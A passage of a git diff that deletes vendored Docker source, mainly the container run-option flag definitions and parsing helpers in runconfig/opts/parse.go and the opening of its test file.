-	flags.Var(&copts.linkLocalIPs, "link-local-ip", "Container IPv4/IPv6 link-local addresses")
-	flags.StringVar(&copts.macAddress, "mac-address", "", "Container MAC address (e.g. 92:d0:c6:0a:29:33)")
-	flags.VarP(&copts.publish, "publish", "p", "Publish a container's port(s) to the host")
-	flags.BoolVarP(&copts.publishAll, "publish-all", "P", false, "Publish all exposed ports to random ports")
-	// We allow for both "--net" and "--network", although the latter is the recommended way.
-	flags.StringVar(&copts.netMode, "net", "default", "Connect a container to a network")
-	flags.StringVar(&copts.netMode, "network", "default", "Connect a container to a network")
-	flags.MarkHidden("net")
-	// We allow for both "--net-alias" and "--network-alias", although the latter is the recommended way.
-	flags.Var(&copts.aliases, "net-alias", "Add network-scoped alias for the container")
-	flags.Var(&copts.aliases, "network-alias", "Add network-scoped alias for the container")
-	flags.MarkHidden("net-alias")
-
-	// Logging and storage
-	flags.StringVar(&copts.loggingDriver, "log-driver", "", "Logging driver for the container")
-	flags.StringVar(&copts.volumeDriver, "volume-driver", "", "Optional volume driver for the container")
-	flags.Var(&copts.loggingOpts, "log-opt", "Log driver options")
-	flags.Var(&copts.storageOpt, "storage-opt", "Storage driver options for the container")
-	flags.Var(&copts.tmpfs, "tmpfs", "Mount a tmpfs directory")
-	flags.Var(&copts.volumesFrom, "volumes-from", "Mount volumes from the specified container(s)")
-	flags.VarP(&copts.volumes, "volume", "v", "Bind mount a volume")
-
-	// Health-checking
-	flags.StringVar(&copts.healthCmd, "health-cmd", "", "Command to run to check health")
-	flags.DurationVar(&copts.healthInterval, "health-interval", 0, "Time between running the check (ns|us|ms|s|m|h) (default 0s)")
-	flags.IntVar(&copts.healthRetries, "health-retries", 0, "Consecutive failures needed to report unhealthy")
-	flags.DurationVar(&copts.healthTimeout, "health-timeout", 0, "Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)")
-	flags.BoolVar(&copts.noHealthcheck, "no-healthcheck", false, "Disable any container-specified HEALTHCHECK")
-
-	// Resource management
-	flags.Uint16Var(&copts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)")
-	flags.Var(&copts.blkioWeightDevice, "blkio-weight-device", "Block IO weight (relative device weight)")
-	flags.StringVar(&copts.containerIDFile, "cidfile", "", "Write the container ID to the file")
-	flags.StringVar(&copts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)")
-	flags.StringVar(&copts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)")
-	flags.Int64Var(&copts.cpuCount, "cpu-count", 0, "CPU count (Windows only)")
-	flags.Int64Var(&copts.cpuPercent, "cpu-percent", 0, "CPU percent (Windows only)")
-	flags.Int64Var(&copts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period")
-	flags.Int64Var(&copts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota")
-	flags.Int64Var(&copts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit CPU real-time period in microseconds")
-	flags.Int64Var(&copts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit CPU real-time runtime in microseconds")
-	flags.Int64VarP(&copts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)")
-	flags.Var(&copts.cpus, "cpus", "Number of CPUs")
-	flags.Var(&copts.deviceReadBps, "device-read-bps", "Limit read rate (bytes per second) from a device")
-	flags.Var(&copts.deviceReadIOps, "device-read-iops", "Limit read rate (IO per second) from a device")
-	flags.Var(&copts.deviceWriteBps, "device-write-bps", "Limit write rate (bytes per second) to a device")
-	flags.Var(&copts.deviceWriteIOps, "device-write-iops", "Limit write rate (IO per second) to a device")
-	flags.StringVar(&copts.ioMaxBandwidth, "io-maxbandwidth", "", "Maximum IO bandwidth limit for the system drive (Windows only)")
-	flags.Uint64Var(&copts.ioMaxIOps, "io-maxiops", 0, "Maximum IOps limit for the system drive (Windows only)")
-	flags.StringVar(&copts.kernelMemory, "kernel-memory", "", "Kernel memory limit")
-	flags.StringVarP(&copts.memoryString, "memory", "m", "", "Memory limit")
-	flags.StringVar(&copts.memoryReservation, "memory-reservation", "", "Memory soft limit")
-	flags.StringVar(&copts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap")
-	flags.Int64Var(&copts.swappiness, "memory-swappiness", -1, "Tune container memory swappiness (0 to 100)")
-	flags.BoolVar(&copts.oomKillDisable, "oom-kill-disable", false, "Disable OOM Killer")
-	flags.IntVar(&copts.oomScoreAdj, "oom-score-adj", 0, "Tune host's OOM preferences (-1000 to 1000)")
-	flags.Int64Var(&copts.pidsLimit, "pids-limit", 0, "Tune container pids limit (set -1 for unlimited)")
-
-	// Low-level execution (cgroups, namespaces, ...)
-	flags.StringVar(&copts.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container")
-	flags.StringVar(&copts.ipcMode, "ipc", "", "IPC namespace to use")
-	flags.StringVar(&copts.isolation, "isolation", "", "Container isolation technology")
-	flags.StringVar(&copts.pidMode, "pid", "", "PID namespace to use")
-	flags.StringVar(&copts.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB")
-	flags.StringVar(&copts.utsMode, "uts", "", "UTS namespace to use")
-	flags.StringVar(&copts.runtime, "runtime", "", "Runtime to use for this container")
-
-	flags.BoolVar(&copts.init, "init", false, "Run an init inside the container that forwards signals and reaps processes")
-	flags.StringVar(&copts.initPath, "init-path", "", "Path to the docker-init binary")
-	return copts
-}
-
-// Parse parses the args for the specified command and generates a Config,
-// a HostConfig and returns them with the specified command.
-// If the specified args are not valid, it will return an error.
-func Parse(flags *pflag.FlagSet, copts *ContainerOptions) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
-	var (
-		attachStdin  = copts.attach.Get("stdin")
-		attachStdout = copts.attach.Get("stdout")
-		attachStderr = copts.attach.Get("stderr")
-	)
-
-	// Validate the input mac address
-	if copts.macAddress != "" {
-		if _, err := ValidateMACAddress(copts.macAddress); err != nil {
-			return nil, nil, nil, fmt.Errorf("%s is not a valid mac address", copts.macAddress)
-		}
-	}
-	if copts.stdin {
-		attachStdin = true
-	}
-	// If -a is not set, attach to stdout and stderr
-	if copts.attach.Len() == 0 {
-		attachStdout = true
-		attachStderr = true
-	}
-
-	var err error
-
-	var memory int64
-	if copts.memoryString != "" {
-		memory, err = units.RAMInBytes(copts.memoryString)
-		if err != nil {
-			return nil, nil, nil, err
-		}
-	}
-
-	var memoryReservation int64
-	if copts.memoryReservation != "" {
-		memoryReservation, err = units.RAMInBytes(copts.memoryReservation)
-		if err != nil {
-			return nil, nil, nil, err
-		}
-	}
-
-	var memorySwap int64
-	if copts.memorySwap != "" {
-		if copts.memorySwap == "-1" {
-			memorySwap = -1
-		} else {
-			memorySwap, err = units.RAMInBytes(copts.memorySwap)
-			if err != nil {
-				return nil, nil, nil, err
-			}
-		}
-	}
-
-	var kernelMemory int64
-	if copts.kernelMemory != "" {
-		kernelMemory, err = units.RAMInBytes(copts.kernelMemory)
-		if err != nil {
-			return nil, nil, nil, err
-		}
-	}
-
-	swappiness := copts.swappiness
-	if swappiness != -1 && (swappiness < 0 || swappiness > 100) {
-		return nil, nil, nil, fmt.Errorf("invalid value: %d. Valid memory swappiness range is 0-100", swappiness)
-	}
-
-	var shmSize int64
-	if copts.shmSize != "" {
-		shmSize, err = units.RAMInBytes(copts.shmSize)
-		if err != nil {
-			return nil, nil, nil, err
-		}
-	}
-
-	// TODO FIXME units.RAMInBytes should have a uint64 version
-	var maxIOBandwidth int64
-	if copts.ioMaxBandwidth != "" {
-		maxIOBandwidth, err = units.RAMInBytes(copts.ioMaxBandwidth)
-		if err != nil {
-			return nil, nil, nil, err
-		}
-		if maxIOBandwidth < 0 {
-			return nil, nil, nil, fmt.Errorf("invalid value: %s. Maximum IO Bandwidth must be positive", copts.ioMaxBandwidth)
-		}
-	}
-
-	var binds []string
-	volumes := copts.volumes.GetMap()
-	// add any bind targets to the list of container volumes
-	for bind := range copts.volumes.GetMap() {
-		if arr := volumeSplitN(bind, 2); len(arr) > 1 {
-			// after creating the bind mount we want to delete it from the copts.volumes values because
-			// we do not want bind mounts being committed to image configs
-			binds = append(binds, bind)
-			// We should delete from the map (`volumes`) here, as deleting from copts.volumes will not work if
-			// there are duplicates entries.
-			delete(volumes, bind)
-		}
-	}
-
-	// Can't evaluate options passed into --tmpfs until we actually mount
-	tmpfs := make(map[string]string)
-	for _, t := range copts.tmpfs.GetAll() {
-		if arr := strings.SplitN(t, ":", 2); len(arr) > 1 {
-			tmpfs[arr[0]] = arr[1]
-		} else {
-			tmpfs[arr[0]] = ""
-		}
-	}
-
-	var (
-		runCmd     strslice.StrSlice
-		entrypoint strslice.StrSlice
-	)
-
-	if len(copts.Args) > 0 {
-		runCmd = strslice.StrSlice(copts.Args)
-	}
-
-	if copts.entrypoint != "" {
-		entrypoint = strslice.StrSlice{copts.entrypoint}
-	} else if flags.Changed("entrypoint") {
-		// if `--entrypoint=` is parsed then Entrypoint is reset
-		entrypoint = []string{""}
-	}
-
-	ports, portBindings, err := nat.ParsePortSpecs(copts.publish.GetAll())
-	if err != nil {
-		return nil, nil, nil, err
-	}
-
-	// Merge in exposed ports to the map of published ports
-	for _, e := range copts.expose.GetAll() {
-		if strings.Contains(e, ":") {
-			return nil, nil, nil, fmt.Errorf("invalid port format for --expose: %s", e)
-		}
-		//support two formats for expose, original format <portnum>/[<proto>] or <startport-endport>/[<proto>]
-		proto, port := nat.SplitProtoPort(e)
-		//parse the start and end port and create a sequence of ports to expose
-		//if expose a port, the start and end port are the same
-		start, end, err := nat.ParsePortRange(port)
-		if err != nil {
-			return nil, nil, nil, fmt.Errorf("invalid range format for --expose: %s, error: %s", e, err)
-		}
-		for i := start; i <= end; i++ {
-			p, err := nat.NewPort(proto, strconv.FormatUint(i, 10))
-			if err != nil {
-				return nil, nil, nil, err
-			}
-			if _, exists := ports[p]; !exists {
-				ports[p] = struct{}{}
-			}
-		}
-	}
-
-	// parse device mappings
-	deviceMappings := []container.DeviceMapping{}
-	for _, device := range copts.devices.GetAll() {
-		deviceMapping, err := ParseDevice(device)
-		if err != nil {
-			return nil, nil, nil, err
-		}
-		deviceMappings = append(deviceMappings, deviceMapping)
-	}
-
-	// collect all the environment variables for the container
-	envVariables, err := ReadKVStrings(copts.envFile.GetAll(), copts.env.GetAll())
-	if err != nil {
-		return nil, nil, nil, err
-	}
-
-	// collect all the labels for the container
-	labels, err := ReadKVStrings(copts.labelsFile.GetAll(), copts.labels.GetAll())
-	if err != nil {
-		return nil, nil, nil, err
-	}
-
-	ipcMode := container.IpcMode(copts.ipcMode)
-	if !ipcMode.Valid() {
-		return nil, nil, nil, fmt.Errorf("--ipc: invalid IPC mode")
-	}
-
-	pidMode := container.PidMode(copts.pidMode)
-	if !pidMode.Valid() {
-		return nil, nil, nil, fmt.Errorf("--pid: invalid PID mode")
-	}
-
-	utsMode := container.UTSMode(copts.utsMode)
-	if !utsMode.Valid() {
-		return nil, nil, nil, fmt.Errorf("--uts: invalid UTS mode")
-	}
-
-	usernsMode := container.UsernsMode(copts.usernsMode)
-	if !usernsMode.Valid() {
-		return nil, nil, nil, fmt.Errorf("--userns: invalid USER mode")
-	}
-
-	restartPolicy, err := ParseRestartPolicy(copts.restartPolicy)
-	if err != nil {
-		return nil, nil, nil, err
-	}
-
-	loggingOpts, err := parseLoggingOpts(copts.loggingDriver, copts.loggingOpts.GetAll())
-	if err != nil {
-		return nil, nil, nil, err
-	}
-
-	securityOpts, err := parseSecurityOpts(copts.securityOpt.GetAll())
-	if err != nil {
-		return nil, nil, nil, err
-	}
-
-	storageOpts, err := parseStorageOpts(copts.storageOpt.GetAll())
-	if err != nil {
-		return nil, nil, nil, err
-	}
-
-	// Healthcheck
-	var healthConfig *container.HealthConfig
-	haveHealthSettings := copts.healthCmd != "" ||
-		copts.healthInterval != 0 ||
-		copts.healthTimeout != 0 ||
-		copts.healthRetries != 0
-	if copts.noHealthcheck {
-		if haveHealthSettings {
-			return nil, nil, nil, fmt.Errorf("--no-healthcheck conflicts with --health-* options")
-		}
-		test := strslice.StrSlice{"NONE"}
-		healthConfig = &container.HealthConfig{Test: test}
-	} else if haveHealthSettings {
-		var probe strslice.StrSlice
-		if copts.healthCmd != "" {
-			args := []string{"CMD-SHELL", copts.healthCmd}
-			probe = strslice.StrSlice(args)
-		}
-		if copts.healthInterval < 0 {
-			return nil, nil, nil, fmt.Errorf("--health-interval cannot be negative")
-		}
-		if copts.healthTimeout < 0 {
-			return nil, nil, nil, fmt.Errorf("--health-timeout cannot be negative")
-		}
-
-		healthConfig = &container.HealthConfig{
-			Test:     probe,
-			Interval: copts.healthInterval,
-			Timeout:  copts.healthTimeout,
-			Retries:  copts.healthRetries,
-		}
-	}
-
-	resources := container.Resources{
-		CgroupParent:         copts.cgroupParent,
-		Memory:               memory,
-		MemoryReservation:    memoryReservation,
-		MemorySwap:           memorySwap,
-		MemorySwappiness:     &copts.swappiness,
-		KernelMemory:         kernelMemory,
-		OomKillDisable:       &copts.oomKillDisable,
-		NanoCPUs:             copts.cpus.Value(),
-		CPUCount:             copts.cpuCount,
-		CPUPercent:           copts.cpuPercent,
-		CPUShares:            copts.cpuShares,
-		CPUPeriod:            copts.cpuPeriod,
-		CpusetCpus:           copts.cpusetCpus,
-		CpusetMems:           copts.cpusetMems,
-		CPUQuota:             copts.cpuQuota,
-		CPURealtimePeriod:    copts.cpuRealtimePeriod,
-		CPURealtimeRuntime:   copts.cpuRealtimeRuntime,
-		PidsLimit:            copts.pidsLimit,
-		BlkioWeight:          copts.blkioWeight,
-		BlkioWeightDevice:    copts.blkioWeightDevice.GetList(),
-		BlkioDeviceReadBps:   copts.deviceReadBps.GetList(),
-		BlkioDeviceWriteBps:  copts.deviceWriteBps.GetList(),
-		BlkioDeviceReadIOps:  copts.deviceReadIOps.GetList(),
-		BlkioDeviceWriteIOps: copts.deviceWriteIOps.GetList(),
-		IOMaximumIOps:        copts.ioMaxIOps,
-		IOMaximumBandwidth:   uint64(maxIOBandwidth),
-		Ulimits:              copts.ulimits.GetList(),
-		Devices:              deviceMappings,
-	}
-
-	config := &container.Config{
-		Hostname:     copts.hostname,
-		ExposedPorts: ports,
-		User:         copts.user,
-		Tty:          copts.tty,
-		// TODO: deprecated, it comes from -n, --networking
-		// it's still needed internally to set the network to disabled
-		// if e.g. bridge is none in daemon opts, and in inspect
-		NetworkDisabled: false,
-		OpenStdin:       copts.stdin,
-		AttachStdin:     attachStdin,
-		AttachStdout:    attachStdout,
-		AttachStderr:    attachStderr,
-		Env:             envVariables,
-		Cmd:             runCmd,
-		Image:           copts.Image,
-		Volumes:         volumes,
-		MacAddress:      copts.macAddress,
-		Entrypoint:      entrypoint,
-		WorkingDir:      copts.workingDir,
-		Labels:          ConvertKVStringsToMap(labels),
-		Healthcheck:     healthConfig,
-	}
-	if flags.Changed("stop-signal") {
-		config.StopSignal = copts.stopSignal
-	}
-	if flags.Changed("stop-timeout") {
-		config.StopTimeout = &copts.stopTimeout
-	}
-
-	hostConfig := &container.HostConfig{
-		Binds:           binds,
-		ContainerIDFile: copts.containerIDFile,
-		OomScoreAdj:     copts.oomScoreAdj,
-		AutoRemove:      copts.autoRemove,
-		Privileged:      copts.privileged,
-		PortBindings:    portBindings,
-		Links:           copts.links.GetAll(),
-		PublishAllPorts: copts.publishAll,
-		// Make sure the dns fields are never nil.
-		// New containers don't ever have those fields nil,
-		// but pre created containers can still have those nil values.
-		// See https://github.com/docker/docker/pull/17779
-		// for a more detailed explanation on why we don't want that.
-		DNS:            copts.dns.GetAllOrEmpty(),
-		DNSSearch:      copts.dnsSearch.GetAllOrEmpty(),
-		DNSOptions:     copts.dnsOptions.GetAllOrEmpty(),
-		ExtraHosts:     copts.extraHosts.GetAll(),
-		VolumesFrom:    copts.volumesFrom.GetAll(),
-		NetworkMode:    container.NetworkMode(copts.netMode),
-		IpcMode:        ipcMode,
-		PidMode:        pidMode,
-		UTSMode:        utsMode,
-		UsernsMode:     usernsMode,
-		CapAdd:         strslice.StrSlice(copts.capAdd.GetAll()),
-		CapDrop:        strslice.StrSlice(copts.capDrop.GetAll()),
-		GroupAdd:       copts.groupAdd.GetAll(),
-		RestartPolicy:  restartPolicy,
-		SecurityOpt:    securityOpts,
-		StorageOpt:     storageOpts,
-		ReadonlyRootfs: copts.readonlyRootfs,
-		LogConfig:      container.LogConfig{Type: copts.loggingDriver, Config: loggingOpts},
-		VolumeDriver:   copts.volumeDriver,
-		Isolation:      container.Isolation(copts.isolation),
-		ShmSize:        shmSize,
-		Resources:      resources,
-		Tmpfs:          tmpfs,
-		Sysctls:        copts.sysctls.GetAll(),
-		Runtime:        copts.runtime,
-	}
-
-	// only set this value if the user provided the flag, else it should default to nil
-	if flags.Changed("init") {
-		hostConfig.Init = &copts.init
-	}
-
-	// When allocating stdin in attached mode, close stdin at client disconnect
-	if config.OpenStdin && config.AttachStdin {
-		config.StdinOnce = true
-	}
-
-	networkingConfig := &networktypes.NetworkingConfig{
-		EndpointsConfig: make(map[string]*networktypes.EndpointSettings),
-	}
-
-	if copts.ipv4Address != "" || copts.ipv6Address != "" || copts.linkLocalIPs.Len() > 0 {
-		epConfig := &networktypes.EndpointSettings{}
-		networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig
-
-		epConfig.IPAMConfig = &networktypes.EndpointIPAMConfig{
-			IPv4Address: copts.ipv4Address,
-			IPv6Address: copts.ipv6Address,
-		}
-
-		if copts.linkLocalIPs.Len() > 0 {
-			epConfig.IPAMConfig.LinkLocalIPs = make([]string, copts.linkLocalIPs.Len())
-			copy(epConfig.IPAMConfig.LinkLocalIPs, copts.linkLocalIPs.GetAll())
-		}
-	}
-
-	if hostConfig.NetworkMode.IsUserDefined() && len(hostConfig.Links) > 0 {
-		epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)]
-		if epConfig == nil {
-			epConfig = &networktypes.EndpointSettings{}
-		}
-		epConfig.Links = make([]string, len(hostConfig.Links))
-		copy(epConfig.Links, hostConfig.Links)
-		networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig
-	}
-
-	if copts.aliases.Len() > 0 {
-		epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)]
-		if epConfig == nil {
-			epConfig = &networktypes.EndpointSettings{}
-		}
-		epConfig.Aliases = make([]string, copts.aliases.Len())
-		copy(epConfig.Aliases, copts.aliases.GetAll())
-		networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig
-	}
-
-	return config, hostConfig, networkingConfig, nil
-}
-
-// ReadKVStrings reads a file of line terminated key=value pairs, and overrides any keys
-// present in the file with additional pairs specified in the override parameter
-func ReadKVStrings(files []string, override []string) ([]string, error) {
-	envVariables := []string{}
-	for _, ef := range files {
-		parsedVars, err := ParseEnvFile(ef)
-		if err != nil {
-			return nil, err
-		}
-		envVariables = append(envVariables, parsedVars...)
-	}
-	// parse the '-e' and '--env' after, to allow override
-	envVariables = append(envVariables, override...)
-
-	return envVariables, nil
-}
-
 // ConvertKVStringsToMap converts ["key=value"] to {"key":"value"}
 func ConvertKVStringsToMap(values []string) map[string]string {
 	result := make(map[string]string, len(values))
@@ -704,292 +18,3 @@ func ConvertKVStringsToMap(values []string) map[string]string {
 
 	return result
 }
-
-// ConvertKVStringsToMapWithNil converts ["key=value"] to {"key":"value"}
-// but set unset keys to nil - meaning the ones with no "=" in them.
-// We use this in cases where we need to distinguish between
-//   FOO=  and FOO
-// where the latter case just means FOO was mentioned but not given a value
-func ConvertKVStringsToMapWithNil(values []string) map[string]*string {
-	result := make(map[string]*string, len(values))
-	for _, value := range values {
-		kv := strings.SplitN(value, "=", 2)
-		if len(kv) == 1 {
-			result[kv[0]] = nil
-		} else {
-			result[kv[0]] = &kv[1]
-		}
-	}
-
-	return result
-}
-
-func parseLoggingOpts(loggingDriver string, loggingOpts []string) (map[string]string, error) {
-	loggingOptsMap := ConvertKVStringsToMap(loggingOpts)
-	if loggingDriver == "none" && len(loggingOpts) > 0 {
-		return map[string]string{}, fmt.Errorf("invalid logging opts for driver %s", loggingDriver)
-	}
-	return loggingOptsMap, nil
-}
-
-// takes a local seccomp daemon, reads the file contents for sending to the daemon
-func parseSecurityOpts(securityOpts []string) ([]string, error) {
-	for key, opt := range securityOpts {
-		con := strings.SplitN(opt, "=", 2)
-		if len(con) == 1 && con[0] != "no-new-privileges" {
-			if strings.Contains(opt, ":") {
-				con = strings.SplitN(opt, ":", 2)
-			} else {
-				return securityOpts, fmt.Errorf("Invalid --security-opt: %q", opt)
-			}
-		}
-		if con[0] == "seccomp" && con[1] != "unconfined" {
-			f, err := ioutil.ReadFile(con[1])
-			if err != nil {
-				return securityOpts, fmt.Errorf("opening seccomp profile (%s) failed: %v", con[1], err)
-			}
-			b := bytes.NewBuffer(nil)
-			if err := json.Compact(b, f); err != nil {
-				return securityOpts, fmt.Errorf("compacting json for seccomp profile (%s) failed: %v", con[1], err)
-			}
-			securityOpts[key] = fmt.Sprintf("seccomp=%s", b.Bytes())
-		}
-	}
-
-	return securityOpts, nil
-}
-
-// parses storage options per container into a map
-func parseStorageOpts(storageOpts []string) (map[string]string, error) {
-	m := make(map[string]string)
-	for _, option := range storageOpts {
-		if strings.Contains(option, "=") {
-			opt := strings.SplitN(option, "=", 2)
-			m[opt[0]] = opt[1]
-		} else {
-			return nil, fmt.Errorf("invalid storage option")
-		}
-	}
-	return m, nil
-}
-
-// ParseRestartPolicy returns the parsed policy or an error indicating what is incorrect
-func ParseRestartPolicy(policy string) (container.RestartPolicy, error) {
-	p := container.RestartPolicy{}
-
-	if policy == "" {
-		return p, nil
-	}
-
-	parts := strings.Split(policy, ":")
-
-	if len(parts) > 2 {
-		return p, fmt.Errorf("invalid restart policy format")
-	}
-	if len(parts) == 2 {
-		count, err := strconv.Atoi(parts[1])
-		if err != nil {
-			return p, fmt.Errorf("maximum retry count must be an integer")
-		}
-
-		p.MaximumRetryCount = count
-	}
-
-	p.Name = parts[0]
-
-	return p, nil
-}
-
-// ParseDevice parses a device mapping string to a container.DeviceMapping struct
-func ParseDevice(device string) (container.DeviceMapping, error) {
-	src := ""
-	dst := ""
-	permissions := "rwm"
-	arr := strings.Split(device, ":")
-	switch len(arr) {
-	case 3:
-		permissions = arr[2]
-		fallthrough
-	case 2:
-		if ValidDeviceMode(arr[1]) {
-			permissions = arr[1]
-		} else {
-			dst = arr[1]
-		}
-		fallthrough
-	case 1:
-		src = arr[0]
-	default:
-		return container.DeviceMapping{}, fmt.Errorf("invalid device specification: %s", device)
-	}
-
-	if dst == "" {
-		dst = src
-	}
-
-	deviceMapping := container.DeviceMapping{
-		PathOnHost:        src,
-		PathInContainer:   dst,
-		CgroupPermissions: permissions,
-	}
-	return deviceMapping, nil
-}
-
-// ParseLink parses and validates the specified string as a link format (name:alias)
-func ParseLink(val string) (string, string, error) {
-	if val == "" {
-		return "", "", fmt.Errorf("empty string specified for links")
-	}
-	arr := strings.Split(val, ":")
-	if len(arr) > 2 {
-		return "", "", fmt.Errorf("bad format for links: %s", val)
-	}
-	if len(arr) == 1 {
-		return val, val, nil
-	}
-	// This is kept because we can actually get a HostConfig with links
-	// from an already created container and the format is not `foo:bar`
-	// but `/foo:/c1/bar`
-	if strings.HasPrefix(arr[0], "/") {
-		_, alias := path.Split(arr[1])
-		return arr[0][1:], alias, nil
-	}
-	return arr[0], arr[1], nil
-}
-
-// ValidateLink validates that the specified string has a valid link format (containerName:alias).
-func ValidateLink(val string) (string, error) {
-	if _, _, err := ParseLink(val); err != nil {
-		return val, err
-	}
-	return val, nil
-}
-
-// ValidDeviceMode checks if the mode for device is valid or not.
-// Valid mode is a composition of r (read), w (write), and m (mknod).
-func ValidDeviceMode(mode string) bool {
-	var legalDeviceMode = map[rune]bool{
-		'r': true,
-		'w': true,
-		'm': true,
-	}
-	if mode == "" {
-		return false
-	}
-	for _, c := range mode {
-		if !legalDeviceMode[c] {
-			return false
-		}
-		legalDeviceMode[c] = false
-	}
-	return true
-}
-
-// ValidateDevice validates a path for devices
-// It will make sure 'val' is in the form:
-//    [host-dir:]container-path[:mode]
-// It also validates the device mode.
-func ValidateDevice(val string) (string, error) {
-	return validatePath(val, ValidDeviceMode)
-}
-
-func validatePath(val string, validator func(string) bool) (string, error) {
-	var containerPath string
-	var mode string
-
-	if strings.Count(val, ":") > 2 {
-		return val, fmt.Errorf("bad format for path: %s", val)
-	}
-
-	split := strings.SplitN(val, ":", 3)
-	if split[0] == "" {
-		return val, fmt.Errorf("bad format for path: %s", val)
-	}
-	switch len(split) {
-	case 1:
-		containerPath = split[0]
-		val = path.Clean(containerPath)
-	case 2:
-		if isValid := validator(split[1]); isValid {
-			containerPath = split[0]
-			mode = split[1]
-			val = fmt.Sprintf("%s:%s", path.Clean(containerPath), mode)
-		} else {
-			containerPath = split[1]
-			val = fmt.Sprintf("%s:%s", split[0], path.Clean(containerPath))
-		}
-	case 3:
-		containerPath = split[1]
-		mode = split[2]
-		if isValid := validator(split[2]); !isValid {
-			return val, fmt.Errorf("bad mode specified: %s", mode)
-		}
-		val = fmt.Sprintf("%s:%s:%s", split[0], containerPath, mode)
-	}
-
-	if !path.IsAbs(containerPath) {
-		return val, fmt.Errorf("%s is not an absolute path", containerPath)
-	}
-	return val, nil
-}
-
-// volumeSplitN splits raw into a maximum of n parts, separated by a separator colon.
-// A separator colon is the last `:` character in the regex `[:\\]?[a-zA-Z]:` (note `\\` is `\` escaped).
-// In Windows driver letter appears in two situations:
-// a. `^[a-zA-Z]:` (A colon followed  by `^[a-zA-Z]:` is OK as colon is the separator in volume option)
-// b. A string in the format like `\\?\C:\Windows\...` (UNC).
-// Therefore, a driver letter can only follow either a `:` or `\\`
-// This allows to correctly split strings such as `C:\foo:D:\:rw` or `/tmp/q:/foo`.
-func volumeSplitN(raw string, n int) []string {
-	var array []string
-	if len(raw) == 0 || raw[0] == ':' {
-		// invalid
-		return nil
-	}
-	// numberOfParts counts the number of parts separated by a separator colon
-	numberOfParts := 0
-	// left represents the left-most cursor in raw, updated at every `:` character considered as a separator.
-	left := 0
-	// right represents the right-most cursor in raw incremented with the loop. Note this
-	// starts at index 1 as index 0 is already handle above as a special case.
-	for right := 1; right < len(raw); right++ {
-		// stop parsing if reached maximum number of parts
-		if n >= 0 && numberOfParts >= n {
-			break
-		}
-		if raw[right] != ':' {
-			continue
-		}
-		potentialDriveLetter := raw[right-1]
-		if (potentialDriveLetter >= 'A' && potentialDriveLetter <= 'Z') || (potentialDriveLetter >= 'a' && potentialDriveLetter <= 'z') {
-			if right > 1 {
-				beforePotentialDriveLetter := raw[right-2]
-				// Only `:` or `\\` are checked (`/` could fall into the case of `/tmp/q:/foo`)
-				if beforePotentialDriveLetter != ':' && beforePotentialDriveLetter != '\\' {
-					// e.g. `C:` is not preceded by any delimiter, therefore it was not a drive letter but a path ending with `C:`.
-					array = append(array, raw[left:right])
-					left = right + 1
-					numberOfParts++
-				}
-				// else, `C:` is considered as a drive letter and not as a delimiter, so we continue parsing.
-			}
-			// if right == 1, then `C:` is the beginning of the raw string, therefore `:` is again not considered a delimiter and we continue parsing.
-		} else {
-			// if `:` is not preceded by a potential drive letter, then consider it as a delimiter.
-			array = append(array, raw[left:right])
-			left = right + 1
-			numberOfParts++
-		}
-	}
-	// need to take care of the last part
-	if left < len(raw) {
-		if n >= 0 && numberOfParts >= n {
-			// if the maximum number of parts is reached, just append the rest to the last part
-			// left-1 is at the last `:` that needs to be included since not considered a separator.
-			array[n-1] += raw[left-1:]
-		} else {
-			array = append(array, raw[left:])
-		}
-	}
-	return array
-}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse_test.go b/vendor/github.com/docker/docker/runconfig/opts/parse_test.go
deleted file mode 100644
index a1be379ae8..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/parse_test.go
+++ /dev/null
@@ -1,894 +0,0 @@
-package opts
-
-import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"io/ioutil"
-	"os"
-	"runtime"
-	"strings"
-	"testing"
-	"time"
-
-	"github.com/docker/docker/api/types/container"
-	networktypes "github.com/docker/docker/api/types/network"
-	"github.com/docker/docker/runconfig"
-	"github.com/docker/go-connections/nat"
-	"github.com/spf13/pflag"
-)
-
-func parseRun(args []string) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
-	flags := pflag.NewFlagSet("run", pflag.ContinueOnError)
-	flags.SetOutput(ioutil.Discard)
-	flags.Usage = nil
-	copts := AddFlags(flags)
-	if err := flags.Parse(args); err != nil {
-		return nil, nil, nil, err
-	}
-	return Parse(flags, copts)
-}
-
-func parse(t *testing.T, args string) (*container.Config, *container.HostConfig, error) {
-	config, hostConfig, _, err := parseRun(strings.Split(args+" ubuntu bash", " "))
-	return config, hostConfig, err
-}
-
-func mustParse(t *testing.T, args string) (*container.Config, *container.HostConfig) {
-	config, hostConfig, err := parse(t, args)
-	if err != nil {
-		t.Fatal(err)
-	}
-	return config, hostConfig
-}
-
-func TestParseRunLinks(t *testing.T) {
-	if _, hostConfig := mustParse(t, "--link a:b"); len(hostConfig.Links) == 0 || hostConfig.Links[0] != "a:b" {
-		t.Fatalf("Error parsing links. Expected []string{\"a:b\"}, received: %v", hostConfig.Links)
-	}
-	if _, hostConfig := mustParse(t, "--link a:b --link c:d"); len(hostConfig.Links) < 2 || hostConfig.Links[0] != "a:b" || hostConfig.Links[1] != "c:d" {
-		t.Fatalf("Error parsing links. Expected []string{\"a:b\", \"c:d\"}, received: %v", hostConfig.Links)
-	}
